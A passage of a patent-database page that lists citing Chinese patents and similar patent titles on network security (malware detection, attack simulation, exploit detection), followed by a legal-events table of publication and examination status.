CN116886423B (zh) * | 2023-08-15 | 2024-02-06 | 广东中山网传媒信息科技有限公司 | 一种服务器安全异常检测方法、系统、存储介质及设备 |
CN116866193A (zh) * | 2023-09-05 | 2023-10-10 | 中国电子信息产业集团有限公司第六研究所 | 一种网络攻击演练方法、装置、电子设备及存储介质 |
CN116866193B (zh) * | 2023-09-05 | 2023-11-21 | 中国电子信息产业集团有限公司第六研究所 | 一种网络攻击演练方法、装置、电子设备及存储介质 |
CN117610018A (zh) * | 2023-12-01 | 2024-02-27 | 深圳市马博士网络科技有限公司 | 漏洞模拟方法及装置 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
Lee et al. | Delta: A security assessment framework for software-defined networks. | |
US10192052B1 (en) | System, apparatus and method for classifying a file as malicious using static scanning | |
US10242186B2 (en) | System and method for detecting malicious code in address space of a process | |
US10678919B2 (en) | System and method for detecting and monitoring process creation | |
CN116318983A (zh) | 一种网络攻击仿真方法、系统、电子设备及可读存储介质 | |
US8990944B1 (en) | Systems and methods for automatically detecting backdoors | |
AU2016369460B2 (en) | Dual memory introspection for securing multiple network endpoints | |
US9910988B1 (en) | Malware analysis in accordance with an analysis plan | |
US10148693B2 (en) | Exploit detection system | |
US10909244B1 (en) | Computer network defense training on operational networks using software agents | |
US20180191779A1 (en) | Flexible Deception Architecture | |
Jero et al. | Beads: Automated attack discovery in openflow-based sdn systems | |
EP2106085A1 (en) | System and method for securing a network from zero-day vulnerability exploits | |
JP2019220126A (ja) | ユーザのコンピュータ装置への攻撃に対抗するシステムおよび方法 | |
US20120297476A1 (en) | Verifying Transactions Using Out-of-Band Devices | |
US20170339174A1 (en) | Computer security apparatus | |
CN110968872A (zh) | 文件漏洞的检测处理方法、装置、电子设备及存储介质 | |
RU101235U1 (ru) | Система проверки на присутствие вредоносного программного обеспечения с изменяемыми настройками проверки | |
JP2016519365A (ja) | クラウド環境における性能テスト費用の節減のためのテストシステムおよびテスト方法 | |
CN112398857B (zh) | 防火墙测试方法、装置、计算机设备和存储介质 | |
US11392700B1 (en) | System and method for supporting cross-platform data verification | |
CN114285608B (zh) | 一种网络攻击诱捕方法、装置、电子设备及存储介质 | |
US8474046B1 (en) | Systems and methods for identifying the spreading of sensitive data by a suspicious application | |
US11636198B1 (en) | System and method for cybersecurity analyzer update and concurrent management system | |
US11677786B1 (en) | System and method for detecting and protecting against cybersecurity attacks on servers |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination |